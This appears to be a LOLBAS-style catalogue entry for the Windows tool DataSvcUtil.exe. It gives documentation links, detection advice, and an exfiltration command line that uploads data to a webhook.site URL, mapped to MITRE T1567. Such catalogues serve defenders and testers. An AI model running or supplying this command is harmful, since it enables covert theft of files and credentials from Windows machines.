.. / DataSvcUtil.exe
Star

DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.


Paths:


Resources:
https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe
https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services
https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services

Acknowledgement:
Ialle Teixeira - @NtSetDefault


Detection:
The DataSvcUtil.exe tool is installed in the .NET Framework directory.
Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.



Upload

Upload file, credentials or data exfiltration in general
DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
Usecase:Upload file
Privileges required:User
OS:Windows 10
Mitre:T1567